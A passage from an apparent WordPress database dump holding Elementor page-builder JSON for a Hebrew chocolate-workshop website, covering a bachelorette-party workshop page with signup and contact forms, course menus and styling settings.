\\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b2bedda\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"71a725e0\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(443,106,'_elementor_version','0.4'),(444,107,'_wp_page_template','elementor_canvas'),(445,107,'_elementor_edit_mode','builder'),(446,107,'_elementor_template_type','post'),(447,107,'_elementor_data','[{\"id\":\"72271eb7\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"16fbf649\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"66e81b8e\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e020468\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"3ade1445\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"16f6135c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e598d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5064e7e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3f5421\",\"elType\":\"widget\",\"settings\":{\"html_tag\":\"p\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c6b6e2f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"4bb4f72e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"6ddff824\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"df02b1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/bach-choco.jpg\",\"id\":97},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4b78ab22\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05e8\\u05d5\\u05e6\\u05d5\\u05ea \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05dc\\u05d4 \\\"TO BE\\\" \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3? \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05ea\\u05df \\u05e8\\u05e6\\u05d5\\u05ea \\u05dc\\u05e9\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05ea\\u05d5\\u05ea \\u05d5\\u05d0\\u05ea \\u05d4\\u05e7\\u05e9\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05db\\u05df, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05dc\\u05db\\u05dc \\u05d0\\u05d3\\u05dd.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d6\\u05e8\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4 \\u05ea\\u05d9\\u05d4\\u05e0\\u05d4 \\u05de\\u05d4\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d4\\u05e4\\u05ea\\u05e2\\u05d5\\u05ea \\u05d5\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05e8 \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d0\\u05dc\\u05db\\u05d5\\u05d4\\u05d5\\u05dc \\u05d5\\u05de\\u05d5\\u05d6\\u05d9\\u05e7\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05db\\u05d9\\u05e4\\u05d9\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05dc\\u05db\\u05dc \\u05d0\\u05d9\\u05e9\\u05d4 \\u05d5\\u05d7\\u05d1\\u05e8\\u05d4. \\u05ea\\u05e2\\u05e9\\u05d5 \\u05d7\\u05d9\\u05d9\\u05dd, \\u05d5\\u05db\\u05de\\u05d5\\u05d1\\u05df, \\u05d4\\u05e8\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea \\u05ea\\u05e2\\u05d6\\u05d5\\u05e8 \\u05dc\\u05db\\u05df \\u05dc\\u05d4\\u05e4\\u05d5\\u05da \\u05d0\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05dc\\u05de\\u05ea\\u05d5\\u05e7 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05e8\\u05d0\\u05e9\\u05d5\\u05df.\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7eb3f731\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"aade027\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"724228ca\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"17359a70\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"1e100444\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a7862b8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"76559f59\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"57042d54\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3bf45bcb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"4cc9e605\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"75f8d32a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62c4f6c\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"6d2d5f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"5a71e36\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"156941b9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 